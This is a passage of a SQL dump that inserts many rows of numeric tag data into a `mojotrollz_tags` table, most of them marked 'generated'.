0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176557, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176558, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176559, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176560, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176561, 2, 1, 289, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176573, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176574, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176576, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176577, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176578, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176579, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176580, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176581, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176582, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176583, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176584, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176586, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176587, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176588, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176589, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176591, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176594, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176604, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176604, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176604, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176604, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176605, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176605, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176605, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176605, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176606, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176606, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176606, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176606, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176607, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176607, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176607, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176607, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176608, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176608, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176608, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176608, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176609, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176609, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176609, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176609, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176610, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176610, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176610, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176610, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176611, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176611, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176611, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176611, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176612, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176612, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176612, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176612, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176617, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176617, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176617, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176617, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176618, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176618, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176618, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176618, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176619, 2, 1, 309, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176619, 2, 2, 19, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176619, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176619, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176624, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176625, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176626, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176627, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176628, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176629, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176630, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176631, 2, 1, 329, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176631, 2, 2, 2017, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176631, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176631, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176632, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176633, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176634, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176635, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176636, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176637, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176638, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176639, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176640, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176641, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176642, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176643, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176645, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176665, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176665, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176666, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176666, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176667, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176667, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176668, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176668, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176669, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176669, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176670, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176670, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176671, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176671, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176672, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176672, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176673, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176673, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176674, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176674, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176675, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176675, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176676, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176676, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176677, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176677, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176678, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176678, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176679, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176679, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176680, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176680, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176681, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176681, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176682, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176682, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176683, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176683, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176684, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176684, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176685, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176685, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176686, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176686, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176687, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176687, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176688, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176688, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176689, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176689, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176690, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176690, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176691, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176691, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176692, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176692, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176693, 2, 1, 189, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176693, 2, 2, 796, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176694, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176705, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176745, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176746, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176747, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176748, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176749, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176751, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176752, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176753, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176767, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176768, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176785, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176787, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176789, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176790, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176791, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176792, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176793, 2, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176794, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176795, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176796, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176797, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176798, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176799, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176800, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176801, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176804, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176805, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176806, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176807, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176808, 2, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176809, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176809, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176809, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176809, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176810, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176810, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176810, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176810, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176811, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176811, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176811, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176811, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176812, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176812, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176812, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176812, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176813, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176813, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176813, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176813, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176814, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176814, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176814, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176814, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176815, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176815, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176815, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176815, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176816, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176816, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176816, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176816, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176817, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176817, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176817, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176817, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176818, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176818, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176818, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176818, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176819, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176819, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176819, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176819, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176820, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176820, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176820, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176820, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176821, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176821, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176821, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176821, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176822, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176822, 2, 2, 512, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176822, 2, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176822, 2, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (176823, 2, 1, 249, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, 